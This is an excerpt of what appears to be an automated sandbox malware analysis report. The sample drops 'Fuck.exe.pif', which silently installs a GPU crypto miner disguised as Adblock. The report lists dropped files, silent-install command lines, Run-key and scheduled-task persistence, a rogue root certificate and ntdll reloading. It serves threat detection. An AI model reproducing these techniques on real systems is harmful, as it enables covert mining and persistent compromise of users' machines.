                Source: Binary string: wextract.pdbGCTL source: l39HA25qjw.exe, 00000001.00000000.42202825202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Fuck.exe.pif, 00000014.00000003.42873695221.0000000003E3E000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: R:\massivesdk_gpu-miner-extern\XHV\XMRCLBridge\x64\ReleaseDLL\XMRCLBridge.pdb source: FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: ads.pdbarea.com source: FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: R:\massivesdk_master\core\mining\gpu\external\SysGpuInfoEx\x64\RelDLL\SysGpuInfoEx.pdbKK source: FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: R:\massivesdk_master\core\mining\gpu\external\SysGpuInfoEx\x64\RelDLL\SysGpuInfoEx.pdb source: FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: R:\massivesdk_gpu-miner-extern\XHV\XMRCLBridge\x64\ReleaseDLLNV\XMRCLBridgeNV.pdb source: FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\vladimir\projects\massivesdk\cmake-build-vs16-x64-embedded\bin\RelWithDebInfo\xmrBridge.pdb source: FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: R:\massivesdk_gpu-miner-extern\XHV\XMRCLBridge\x64\ReleaseDLLNV\XMRCLBridgeNV.pdbMM!GCTL source: FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifUnpacked PE file: 20.2.Fuck.exe.pif.2750000.4.unpack
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^xAuYKKZEsy$" Similarly.wms
                Source: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQProcess created: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp "C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp" /SL5="$5040E,11860388,791040,C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ" -/SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=767
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^xAuYKKZEsy$" Similarly.wms Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQProcess created: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp "C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp" /SL5="$5040E,11860388,791040,C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ" -/SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=767Jump to behavior
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_004071FD push ecx; ret 1_2_00407210
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E80CF6 push ecx; ret 13_2_00E80D09
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E80CF6 push ecx; ret 19_2_00E80D09
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00402F10 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00402F10
                Source: fwrhglUiBb.dll.13.drStatic PE information: 0x8A32A22A [Mon Jun 22 08:22:02 2043 UTC]
                Source: fwrhglUiBb.dll.13.drStatic PE information: section name: RT
                Source: fwrhglUiBb.dll.13.drStatic PE information: section name: .mrdata
                Source: fwrhglUiBb.dll.13.drStatic PE information: section name: .00cfg
                Source: mp3studios_6[1].exe.20.drStatic PE information: section name: .ljhskbs
                Source: mp3studios_6[1].exe.20.drStatic PE information: section name: .ljhskbs
                Source: AdblockInstaller[1].exe.20.drStatic PE information: section name: .didata
                Source: pb1105[1].exe.20.drStatic PE information: section name: _RDATA
                Source: pb1105[1].exe.20.drStatic PE information: section name: .vmp0
                Source: pb1105[1].exe.20.drStatic PE information: section name: .vmp1
                Source: jame001[1].exe.20.drStatic PE information: section name: .ask
                Source: jame001[1].exe.20.drStatic PE information: section name: .adata
                Source: FagLhQ.20.drStatic PE information: section name: .didata
                Source: WyFBnl.20.drStatic PE information: section name: _RDATA
                Source: WyFBnl.20.drStatic PE information: section name: .vmp0
                Source: WyFBnl.20.drStatic PE information: section name: .vmp1
                Source: EfRhfn.20.drStatic PE information: section name: .ask
                Source: EfRhfn.20.drStatic PE information: section name: .adata
                Source: DMLnyt.20.drStatic PE information: section name: .ljhskbs
                Source: DMLnyt.20.drStatic PE information: section name: .ljhskbs
                Source: FagLhQ.tmp.21.drStatic PE information: section name: .didata
                Source: is-03UQT.tmp.22.drStatic PE information: section name: .didata
                Source: is-UM4C0.tmp.22.drStatic PE information: section name: CPADinfo
                Source: is-ESNDI.tmp.22.drStatic PE information: section name: CPADinfo
                Source: is-AS67L.tmp.22.drStatic PE information: section name: .nv_fatb
                Source: is-AS67L.tmp.22.drStatic PE information: section name: .nvFatBi
                Source: is-BD3CU.tmp.22.drStatic PE information: section name: .nv_fatb
                Source: is-BD3CU.tmp.22.drStatic PE information: section name: .nvFatBi
                Source: is-3R3M5.tmp.22.drStatic PE information: section name: .wixburn
                Source: EfRhfn.exe.29.drStatic PE information: section name: .ask
                Source: EfRhfn.exe.29.drStatic PE information: section name: .adata
                Source: vc_redist.x64.exe.30.drStatic PE information: section name: .wixburn
                Source: VC_redist.x64.exe.31.drStatic PE information: section name: .wixburn
                Source: VC_redist.x64.exe.36.drStatic PE information: section name: .wixburn
                Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
                Source: l39HA25qjw.exeStatic PE information: real checksum: 0xd0513 should be: 0xccd14
                Source: fliu[1].exe.20.drStatic PE information: real checksum: 0x21d7e should be: 0x207a4
                Source: DMLnyt.20.drStatic PE information: real checksum: 0x0 should be: 0x1719ce
                Source: pb1105[1].exe.20.drStatic PE information: real checksum: 0x0 should be: 0x383a4b
                Source: MpVMRr.20.drStatic PE information: real checksum: 0x21d7e should be: 0x207a4
                Source: EfRhfn.exe.29.drStatic PE information: real checksum: 0x0 should be: 0x11e725
                Source: EfRhfn.20.drStatic PE information: real checksum: 0x0 should be: 0x11e725
                Source: jame001[1].exe.20.drStatic PE information: real checksum: 0x0 should be: 0x11e725
                Source: mp3studios_6[1].exe.20.drStatic PE information: real checksum: 0x0 should be: 0x1719ce
                Source: WyFBnl.20.drStatic PE information: real checksum: 0x0 should be: 0x383a4b
                Source: initial sampleStatic PE information: section name: .text entropy: 6.845118704586284
                Source: initial sampleStatic PE information: section name: .text entropy: 7.999735953883561
                Source: initial sampleStatic PE information: section name: .text entropy: 7.999735953883561
                Source: initial sampleStatic PE information: section name: .text entropy: 7.999735953883561

                Persistence and Installation Behavior

                barindex
                Source: C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRrWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
                Source: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfnFile created: C:\Users\user\Documents\VlcpVideoV1.0.1\EfRhfn.exeJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifJump to dropped file
                Source: C:\Windows\System32\svchost.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\844918F60F939B112F07B402C479421800EB2CD5 Blob
                Source: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exeFile created: C:\ProgramData\Package Cache\{3746f21b-c990-4045-bb33-1cf98cff7a68}\VC_redist.x64.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnlJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRrJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfnJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Temp\XbCZmnlWlcNasYtQIR\xfQBIgJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\WinSparkle.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\crashpad_handler.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-8D8UE.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQFile created: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\PEInjector.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\MiningGpu.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-THGP9.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\SysGpuInfoEx.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfnFile created: C:\Users\user\Documents\VlcpVideoV1.0.1\EfRhfn.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\nvrtc64_100_0.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwrhglUiBb.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-UM4C0.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-OFSVL.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-ESNDI.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-03UQT.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnlJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRrJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-OAES3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\DnsService.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Temp\XbCZmnlWlcNasYtQIR\xfQBIgJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-NIJ7O.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-CRQM5.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRrFile created: C:\Users\user\AppData\Local\Temp\db.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\nvrtc-builtins64_100.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-B71RB.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\kawBridge.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\Adblock.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\AdblockInstaller[1].exeJump to dropped file
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\wixstdba.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\pb1105[1].exeJump to dropped file
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-1R9C0.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\is-3R3M5.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\xmrBridge.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exeFile created: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-Q0IO6.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-6I5O7.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfnJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\fliu[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\MassiveService.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: :y (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\nvml.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\XMRCLBridgeNV.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-AS67L.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\is-BD3CU.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\jame001[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\setup[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\Programs\Adblock\XMRCLBridge.dll (copy)Jump to dropped file
                Source: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exeFile created: C:\ProgramData\Package Cache\{3746f21b-c990-4045-bb33-1cf98cff7a68}\VC_redist.x64.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exeFile created: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeJump to dropped file
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\wixstdba.dllJump to dropped file
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exeJump to dropped file
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00401B04 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00401B04
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1028\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1029\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1031\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1036\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1040\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1041\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1042\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1045\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1046\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1049\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\1055\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\2052\license.rtf
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeFile created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.ba\3082\license.rtf
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\AppData\Local\Temp\Setup Log 2022-10-04 #001.txtJump to behavior

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\l39HA25qjw.exeProcess created: C:\Windows\SysWOW64\at.exe at 3874982763784yhwgdfg78234789s42809374918uf
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adblock.lnkJump to behavior
                Source: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SystemRestore
                Source: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfnRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyStart
                Source: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfnRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyStart

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\IXP000.TMP\FWRHGLUIBB.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\IXP000.TMP\FWRHGLUIBB.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\IXP000.TMP\FWRHGLUIBB.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\IXP000.TMP\FWRHGLUIBB.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\IXP000.TMP\FWRHGLUIBB.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\IXP000.TMP\FWRHGLUIBB.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\IXP000.TMP\FWRHGLUIBB.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
                Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49843
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EF24A6 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,13_2_00EF24A6
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E7F2C0 GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,13_2_00E7F2C0
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00EF24A6 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,19_2_00EF24A6
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E7F2C0 GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,19_2_00E7F2C0
                Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{VGTZJDWB-HTAP-SA40-YI9P-5CQD4BIE6B48}\650478DC7424C37C 1
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
